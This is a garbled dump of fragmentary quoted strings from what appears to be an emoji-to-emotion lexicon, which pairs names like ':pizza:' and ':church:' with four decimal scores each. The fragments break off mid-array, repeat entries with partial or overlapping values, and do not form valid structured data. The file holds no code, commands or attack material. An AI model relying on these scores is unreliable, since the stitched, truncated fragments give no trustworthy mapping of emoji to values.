[0.262, 0.255, 0.222, 0.22899999999999998], \":pizza:\": [0.142, 0.109, 0.149,", "0.259, 0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355, 0.149],", "0.08800000000000001, 0.332], \":house:\": [0.13699999999999998, 0.27399999999999997, 0.18600000000000003, 0.235], \":peach:\": [0.344, 0.204, 0.128, 0.11900000000000001], \":roller_coaster:\":", "[0.158, 0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327, 0.221], \":penguin:\": [0.151, 0.188, 0.134,", "0.152], \":name_badge:\": [0.26899999999999996, 0.25, 0.147, 0.201], \":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995, 0.215], \":graduation_cap:\": [0.162,", "0.22899999999999998, 0.259], \":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134, 0.35200000000000004], \":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\":", "0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34, 0.265], \":school:\": [0.15, 0.268, 0.29600000000000004, 0.162], \":newspaper:\": [0.222,", "[0.162, 0.297, 0.062, 0.2], \":fast_down_button:\": [0.287, 0.247, 0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155, 0.179,", "\":fast-forward_button:\": [0.327, 0.322, 0.17, 0.265], \":office_building:\": [0.18100000000000002, 0.359, 0.22, 0.19], \":radio:\": [0.187, 0.222,", "0.237, 0.429, 0.07], \":page_with_curl:\": [0.201, 0.294, 0.282, 0.27], \":BACK_arrow:\": [0.075, 0.166, 0.062, 0.20199999999999999],", "0.231, 0.266, 0.295], \":watch:\": [0.183, 0.276, 0.172, 0.235], \":church:\": [0.20800000000000002, 0.276, 0.773, 0.366],", "\":teacup_without_handle:\": [0.156, 0.237, 0.429, 0.07], \":page_with_curl:\": [0.201, 0.294, 0.282, 0.27], \":BACK_arrow:\": [0.075, 0.166,", "0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188, 0.149], \":folded_hands:\": [0.187, 0.17800000000000002, 0.485, 0.35100000000000003],", "0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998, 0.228], \":ear:\": [0.299, 0.33, 0.316, 0.35700000000000004],", "0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146, 0.245], \":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\": [0.138,", "[0.183, 0.129, 0.16699999999999998, 0.226], \":factory:\": [0.205, 0.306, 0.24600000000000002, 0.21], \":disappointed_face:\": [0.318, 0.467, 0.131,", "0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266, 0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201, 0.305],", "[0.37, 0.35200000000000004, 0.16899999999999998, 0.166], \":floppy_disk:\": [0.168, 0.324, 0.341, 0.308], \":orange_book:\": [0.18100000000000002, 0.193, 0.18600000000000003,", "0.331, 0.262, 0.299], \":tennis:\": [0.174, 0.198, 0.174, 0.327], \":sleeping_face:\": [0.266, 0.23399999999999999, 0.33, 0.255],", "0.23600000000000002, 0.251, 0.256], \":white_medium_star:\": [0.237, 0.175, 0.29, 0.16], \":dashing_away:\": [0.363, 0.18, 0.102, 0.16399999999999998],", "0.177], \":anguished_face:\": [0.309, 0.485, 0.14, 0.369], \":flushed_face:\": [0.281, 0.263, 0.102, 0.231], \":person_frowning:\": [0.34600000000000003,", "0.099, 0.326], \":neutral_face:\": [0.415, 0.309, 0.149, 0.322], \":ant:\": [0.26899999999999996, 0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\":", "[0.16399999999999998, 0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146, 0.046], \":Japanese_dolls:\": [0.053, 0.14, 0.07,", "0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179, 0.242], \":goblin:\": [0.42, 0.35, 0.149, 0.301], \":person_getting_haircut:\":", "0.18, 0.308, 0.13699999999999998], \":kissing_face:\": [0.215, 0.171, 0.159, 0.272], \":glowing_star:\": [0.191, 0.215, 0.38, 0.134],", "\":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28, 0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\": [0.292, 0.263,", "[0.183, 0.131, 0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146, 0.245], \":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997, 0.207,", "0.261], \":clipboard:\": [0.157, 0.233, 0.331, 0.21100000000000002], \":persevering_face:\": [0.327, 0.516, 0.175, 0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998,", "\":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23, 0.262], \":green_book:\": [0.154, 0.24, 0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179,", "[0.087, 0.245, 0.192, 0.034], \":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183, 0.131, 0.341,", "[0.15, 0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213, 0.055, 0.081, 0.193], \":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003,", "0.022000000000000002, 0.215, 0.14400000000000002], \":information:\": [0.17800000000000002, 0.259, 0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067, 0.134],", "\":cow_face:\": [0.142, 0.222, 0.129, 0.185], \":tiger_face:\": [0.13, 0.392, 0.07400000000000001, 0.259], \":sunrise:\": [0.107, 0.292,", "\":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998, 0.155], \":alien_monster:\": [0.128, 0.228, 0.087, 0.19699999999999998], \":file_folder:\": [0.151, 0.217,", "0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\": [0.075, 0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\": [0.155, 0.142, 0.141, 0.23],", "0.19699999999999998], \":person_bowing:\": [0.256, 0.331, 0.262, 0.299], \":tennis:\": [0.174, 0.198, 0.174, 0.327], \":sleeping_face:\": [0.266,", "0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002, 0.201], \":birthday_cake:\": [0.055, 0.185, 0.317, 0.122], \":carousel_horse:\":", "0.485, 0.35100000000000003], \":musical_note:\": [0.26, 0.191, 0.341, 0.32799999999999996], \":monkey:\": [0.179, 0.379, 0.083, 0.032], \":mouse_face:\":", "0.225, 0.163], \":ribbon:\": [0.20199999999999999, 0.203, 0.345, 0.193], \":link:\": [0.258, 0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\":", "0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212, 0.188, 0.16699999999999998, 0.392], \":Scorpio:\": [0.185, 0.218, 0.302, 0.27399999999999997],", "0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002, 0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327, 0.09, 0.092], \":wind_chime:\":", "[0.18, 0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213, 0.17, 0.233, 0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163,", "\":ear:\": [0.299, 0.33, 0.316, 0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998,", "\":microphone:\": [0.121, 0.081, 0.237, 0.29], \":musical_score:\": [0.149, 0.09, 0.371, 0.315], \":white_square_button:\": [0.35100000000000003, 0.226,", "0.122, 0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999, 0.147], \":card_index:\": [0.147, 0.196, 0.249, 0.212],", "0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327, 0.221], \":penguin:\": [0.151, 0.188, 0.134, 0.141], \":cow_face:\":", "0.212], \":lady_beetle:\": [0.228, 0.22, 0.20800000000000002, 0.153], \":hatching_chick:\": [0.099, 0.171, 0.16, 0.125], \":heavy_dollar_sign:\": [0.203,", "0.341, 0.209, 0.198], \":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 0.196, 0.317, 0.28600000000000003],", "\":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34, 0.265], \":school:\": [0.15, 0.268, 0.29600000000000004, 0.162], \":newspaper:\": [0.222, 0.33799999999999997,", "0.239], \":syringe:\": [0.21, 0.245, 0.142, 0.124], \":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163,", "\":blue_heart:\": [0.14800000000000002, 0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237, 0.28], \":moai:\": [0.131, 0.153,", "[0.335, 0.212, 0.17600000000000002, 0.3], \":left_arrow:\": [0.282, 0.221, 0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198, 0.337,", "[0.244, 0.34, 0.19899999999999998, 0.332], \":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001, 0.135], \":cactus:\": [0.087, 0.245, 0.192,", "[0.196, 0.172, 0.3, 0.179], \":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004, 0.204], \":no_entry:\": [0.312, 0.445, 0.136,", "\":Aries:\": [0.214, 0.212, 0.284, 0.196], \":meat_on_bone:\": [0.177, 0.218, 0.213, 0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996,", "0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\": [0.111, 0.235, 0.225, 0.163], \":ribbon:\": [0.20199999999999999, 0.203, 0.345, 0.193],", "\":herb:\": [0.152, 0.282, 0.509, 0.138], \":guard:\": [0.19, 0.23, 0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141,", "[0.095, 0.13, 0.245, 0.17600000000000002], \":skis:\": [0.10300000000000001, 0.077, 0.051, 0.192], \":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997,", "[0.256, 0.331, 0.262, 0.299], \":tennis:\": [0.174, 0.198, 0.174, 0.327], \":sleeping_face:\": [0.266, 0.23399999999999999, 0.33,", "\":rainbow:\": [0.183, 0.207, 0.317, 0.261], \":microphone:\": [0.121, 0.081, 0.237, 0.29], \":musical_score:\": [0.149, 0.09,", "\":orange_book:\": [0.18100000000000002, 0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\": [0.212, 0.16699999999999998,", "[0.162, 0.10300000000000001, 0.392, 0.126], \":inbox_tray:\": [0.205, 0.126, 0.14, 0.213], \":confounded_face:\": [0.392, 0.531, 0.172,", "0.28, 0.16], \":ten_o’clock:\": [0.141, 0.304, 0.191, 0.309], \":red_triangle_pointed_up:\": [0.321, 0.243, 0.25, 0.214], \":grinning_face_with_sweat:\":", "\":exclamation_question_mark:\": [0.188, 0.248, 0.085, 0.21899999999999997], \":poultry_leg:\": [0.121, 0.183, 0.215, 0.122], \":sunset:\": [0.065, 0.19899999999999998,", "\":Tokyo_tower:\": [0.115, 0.092, 0.168, 0.24], \":money_with_wings:\": [0.12300000000000001, 0.096, 0.166, 0.121], \":fax_machine:\": [0.24100000000000002, 0.35200000000000004,", "[0.24, 0.196, 0.168, 0.248], \":hot_beverage:\": [0.142, 0.2, 0.317, 0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168,", "0.051, 0.192], \":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997, 0.214], \":kiss_mark:\": [0.272, 0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\":", "\":END_arrow:\": [0.285, 0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001, 0.079], \":new_moon:\": [0.239, 0.221,", "\":diamond_suit:\": [0.305, 0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001, 0.195,", "0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\": [0.305, 0.22699999999999998, 0.126, 0.187], \":white_large_square:\": [0.348, 0.19399999999999998, 0.155, 0.22899999999999998],", "\":laptop_computer:\": [0.127, 0.23399999999999999, 0.35, 0.255], \":mushroom:\": [0.188, 0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177,", "\":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355, 0.149], \":cookie:\": [0.11699999999999999, 0.18, 0.168, 0.1], \":running_shirt:\": [0.138, 0.081,", "[0.28800000000000003, 0.28800000000000003, 0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276, 0.292], \":seat:\": [0.155, 0.24, 0.067,", "0.195, 0.121], \":pistol:\": [0.259, 0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221, 0.24], \":ATM_sign:\":", "0.299, 0.326, 0.27899999999999997], \":optical_disk:\": [0.22, 0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203, 0.131],", "\":relieved_face:\": [0.127, 0.182, 0.254, 0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\": [0.092, 0.163,", "0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29], \":television:\": [0.322, 0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233,", "0.248, 0.085, 0.21899999999999997], \":poultry_leg:\": [0.121, 0.183, 0.215, 0.122], \":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003, 0.201],", "[0.254, 0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175, 0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\": [0.204, 0.259, 0.303,", "[0.305, 0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17, 0.16, 0.324, 0.156], \":wrapped_gift:\": [0.076, 0.188, 0.326,", "0.163, 0.156], \":yen_banknote:\": [0.217, 0.182, 0.171, 0.302], \":warning:\": [0.264, 0.293, 0.107, 0.212], \":shortcake:\":", "\":inbox_tray:\": [0.205, 0.126, 0.14, 0.213], \":confounded_face:\": [0.392, 0.531, 0.172, 0.433], \":loudspeaker:\": [0.271, 0.19899999999999998,", "0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17, 0.285, 0.081], \":chicken:\": [0.16899999999999998, 0.192, 0.218, 0.127], \":sparkling_heart:\":", "[0.228, 0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\": [0.136, 0.16, 0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179,", "0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002, 0.276, 0.198, 0.272], \":hamburger:\": [0.177, 0.122, 0.18600000000000003, 0.113],", "0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002, 0.152], \":boar:\": [0.187, 0.26899999999999996, 0.122, 0.158],", "0.22899999999999998], \":pizza:\": [0.142, 0.109, 0.149, 0.11], \":incoming_envelope:\": [0.24, 0.196, 0.168, 0.248], \":hot_beverage:\": [0.142,", "0.20800000000000002], \":satellite_antenna:\": [0.204, 0.259, 0.303, 0.27], \":mobile_phone:\": [0.127, 0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\": [0.305,", "0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21, 0.19, 0.149, 0.192], \":camera:\": [0.198, 0.29600000000000004, 0.287, 0.19699999999999998],", "[0.141, 0.304, 0.191, 0.309], \":red_triangle_pointed_up:\": [0.321, 0.243, 0.25, 0.214], \":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998,", "[0.162, 0.301, 0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251, 0.239, 0.08], \":Tokyo_tower:\": [0.115, 0.092, 0.168,", "0.10300000000000001, 0.175], \":wedding:\": [0.092, 0.139, 0.631, 0.252], \":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\":", "0.259], \":sunrise:\": [0.107, 0.292, 0.4, 0.158], \":artist_palette:\": [0.136, 0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999,", "0.217, 0.168], \":front-facing_baby_chick:\": [0.135, 0.147, 0.152, 0.151], \":barber_pole:\": [0.135, 0.163, 0.174, 0.18], \":backhand_index_pointing_left:\":", "\":beating_heart:\": [0.171, 0.078, 0.32299999999999995, 0.157], \":grinning_face:\": [0.163, 0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16,", "[0.139, 0.15, 0.278, 0.185], \":mahjong_red_dragon:\": [0.171, 0.263, 0.128, 0.212], \":sushi:\": [0.134, 0.196, 0.13699999999999998,", "0.218, 0.213, 0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29], \":television:\": [0.322, 0.247, 0.22699999999999998, 0.222],", "0.20800000000000002], \":chocolate_bar:\": [0.147, 0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\": [0.192, 0.184, 0.188, 0.12], \":Leo:\": [0.24100000000000002,", "[0.34, 0.493, 0.161, 0.27], \":green_heart:\": [0.126, 0.159, 0.373, 0.19], \":input_latin_letters:\": [0.134, 0.126, 0.166,", "[0.063, 0.271, 0.14, 0.122], \":paw_prints:\": [0.266, 0.249, 0.129, 0.155], \":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001,", "0.289, 0.083, 0.172], \":laptop_computer:\": [0.127, 0.23399999999999999, 0.35, 0.255], \":mushroom:\": [0.188, 0.239, 0.21, 0.084],", "0.226], \":house_with_garden:\": [0.115, 0.24, 0.268, 0.153], \":spiral_shell:\": [0.106, 0.301, 0.316, 0.174], \":backhand_index_pointing_right:\": [0.19699999999999998,", "0.159], \":open_book:\": [0.196, 0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23, 0.262], \":green_book:\": [0.154,", "[0.149, 0.14300000000000002, 0.43700000000000006, 0.231], \":tropical_fish:\": [0.063, 0.271, 0.14, 0.122], \":paw_prints:\": [0.266, 0.249, 0.129,", "0.156, 0.111, 0.153], \":speak-no-evil_monkey:\": [0.214, 0.2, 0.081, 0.147], \":hot_springs:\": [0.21, 0.228, 0.128, 0.17300000000000001],", "0.155], \":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998, 0.157, 0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998,", "0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\":", "0.231, 0.204], \":down_arrow:\": [0.33899999999999997, 0.268, 0.142, 0.252], \":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\":", "0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17, 0.16, 0.324, 0.156],", "\":ferris_wheel:\": [0.092, 0.168, 0.141, 0.156], \":e-mail:\": [0.26, 0.225, 0.21, 0.24], \":black_medium-small_square:\": [0.392, 0.21100000000000002,", "0.21899999999999997, 0.201, 0.255], \":expressionless_face:\": [0.415, 0.308, 0.11, 0.319], \":person_raising_hand:\": [0.068, 0.084, 0.08, 0.156],", "0.14400000000000002], \":bikini:\": [0.13, 0.132, 0.177, 0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175, 0.17800000000000002], \":blue_circle:\": [0.203,", "0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\": [0.276, 0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\": [0.154,", "0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268, 0.502, 0.185], \":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994, 0.218],", "0.177, 0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175, 0.17800000000000002], \":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\":", "[0.129, 0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142, 0.205, 0.18100000000000002, 0.156], \":hotel:\": [0.075, 0.24600000000000002, 0.196,", "0.158], \":boy:\": [0.171, 0.155, 0.225, 0.159], \":open_book:\": [0.196, 0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998,", "0.156], \":hotel:\": [0.075, 0.24600000000000002, 0.196, 0.184], \":lipstick:\": [0.276, 0.168, 0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001,", "\":small_blue_diamond:\": [0.23, 0.18100000000000002, 0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002, 0.201], \":birthday_cake:\": [0.055, 0.185,", "0.272], \":hamburger:\": [0.177, 0.122, 0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999, 0.147], \":card_index:\": [0.147,", "\":name_badge:\": [0.26899999999999996, 0.25, 0.147, 0.201], \":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995, 0.215], \":graduation_cap:\": [0.162, 0.10300000000000001,", "\":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078, 0.121], \":tomato:\": [0.284, 0.22, 0.294, 0.23600000000000002], \":blue_book:\": [0.156, 0.191,", "[0.185, 0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\": [0.115, 0.17, 0.256, 0.182], \":shooting_star:\": [0.17600000000000002, 0.16, 0.377,", "0.20600000000000002], \":black_small_square:\": [0.319, 0.249, 0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213, 0.187, 0.27899999999999997], \":performing_arts:\": [0.159,", "0.34, 0.265], \":school:\": [0.15, 0.268, 0.29600000000000004, 0.162], \":newspaper:\": [0.222, 0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\":", "0.166], \":fast_reverse_button:\": [0.301, 0.233, 0.18899999999999997, 0.282], \":violin:\": [0.17600000000000002, 0.139, 0.298, 0.22399999999999998], \":beating_heart:\": [0.171,", "\":person_frowning:\": [0.34600000000000003, 0.374, 0.145, 0.42100000000000004], \":smiling_face:\": [0.095, 0.13, 0.245, 0.17600000000000002], \":skis:\": [0.10300000000000001, 0.077,", "0.24100000000000002, 0.152], \":boar:\": [0.187, 0.26899999999999996, 0.122, 0.158], \":boy:\": [0.171, 0.155, 0.225, 0.159], \":open_book:\":", "0.509, 0.138], \":guard:\": [0.19, 0.23, 0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998, 0.155], \":alien_monster:\":", "0.255], \":expressionless_face:\": [0.415, 0.308, 0.11, 0.319], \":person_raising_hand:\": [0.068, 0.084, 0.08, 0.156], \":sweat_droplets:\": [0.26,", "0.081, 0.147], \":hot_springs:\": [0.21, 0.228, 0.128, 0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997, 0.247, 0.151], \":pineapple:\":", "[0.17800000000000002, 0.259, 0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067, 0.134], \":growing_heart:\": [0.151, 0.067, 0.348,", "0.212], \":ewe:\": [0.29, 0.16899999999999998, 0.12, 0.292], \":dog_face:\": [0.13, 0.18, 0.257, 0.084], \":no_one_under_eighteen:\": [0.109,", "0.295], \":watch:\": [0.183, 0.276, 0.172, 0.235], \":church:\": [0.20800000000000002, 0.276, 0.773, 0.366], \":cyclone:\": [0.16899999999999998,", "0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134, 0.207, 0.222, 0.175], \":person_running:\": [0.162, 0.297, 0.062, 0.2],", "0.215, 0.38, 0.134], \":person_swimming:\": [0.175, 0.159, 0.086, 0.245], \":ogre:\": [0.37, 0.419, 0.109, 0.257],", "0.127], \":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003,", "0.496, 0.17300000000000001, 0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146, 0.046],", "0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268, 0.502, 0.185], \":skull:\": [0.36200000000000004,", "0.172], \":play_button:\": [0.168, 0.284, 0.17, 0.17800000000000002], \":high_voltage:\": [0.252, 0.244, 0.147, 0.228], \":banana:\": [0.21899999999999997,", "[0.188, 0.248, 0.085, 0.21899999999999997], \":poultry_leg:\": [0.121, 0.183, 0.215, 0.122], \":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003,", "0.192, 0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266, 0.25], \":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345, 0.252],", "0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 0.139, 0.129], \":Aries:\": [0.214, 0.212, 0.284, 0.196], \":meat_on_bone:\": [0.177,", "\":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\": [0.21, 0.21,", "[0.213, 0.196, 0.237, 0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32, 0.22699999999999998], \":sake:\": [0.145, 0.255, 0.282,", "0.326], \":neutral_face:\": [0.415, 0.309, 0.149, 0.322], \":ant:\": [0.26899999999999996, 0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251,", "\":person_gesturing_OK:\": [0.155, 0.142, 0.141, 0.23], \":volcano:\": [0.207, 0.247, 0.141, 0.22], \":department_store:\": [0.081, 0.231,", "[0.22, 0.243, 0.213, 0.142], \":clutch_bag:\": [0.12300000000000001, 0.17, 0.253, 0.31], \":hundred_points:\": [0.254, 0.147, 0.145,", "0.168], \":three_o’clock:\": [0.16699999999999998, 0.369, 0.209, 0.282], \":sunflower:\": [0.203, 0.243, 0.354, 0.212], \":lady_beetle:\": [0.228,", "\":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266, 0.25], \":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345, 0.252], \":balloon:\": [0.042, 0.128,", "\":ewe:\": [0.29, 0.16899999999999998, 0.12, 0.292], \":dog_face:\": [0.13, 0.18, 0.257, 0.084], \":no_one_under_eighteen:\": [0.109, 0.136,", "0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175, 0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\": [0.204, 0.259, 0.303, 0.27],", "0.163, 0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226, 0.251], \":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997, 0.139],", "\":nail_polish:\": [0.418, 0.121, 0.314, 0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001, 0.254,", "\":bomb:\": [0.22, 0.196, 0.163, 0.205], \":direct_hit:\": [0.177, 0.213, 0.098, 0.09], \":anger_symbol:\": [0.316, 0.20800000000000002,", "[0.212, 0.293, 0.302, 0.239], \":crystal_ball:\": [0.16899999999999998, 0.22, 0.354, 0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006,", "\":musical_score:\": [0.149, 0.09, 0.371, 0.315], \":white_square_button:\": [0.35100000000000003, 0.226, 0.225, 0.16699999999999998], \":angry_face:\": [0.493, 0.375,", "\":e-mail:\": [0.26, 0.225, 0.21, 0.24], \":black_medium-small_square:\": [0.392, 0.21100000000000002, 0.18600000000000003, 0.255], \":backhand_index_pointing_up:\": [0.259, 0.142,", "0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17, 0.16, 0.324, 0.156], \":wrapped_gift:\": [0.076, 0.188, 0.326, 0.057999999999999996],", "[0.105, 0.196, 0.302, 0.20199999999999999], \":old_man:\": [0.27, 0.263, 0.276, 0.215], \":calendar:\": [0.174, 0.21, 0.131,", "0.209, 0.158, 0.261], \":clipboard:\": [0.157, 0.233, 0.331, 0.21100000000000002], \":persevering_face:\": [0.327, 0.516, 0.175, 0.41600000000000004],", "0.061], \":bookmark:\": [0.257, 0.174, 0.182, 0.289], 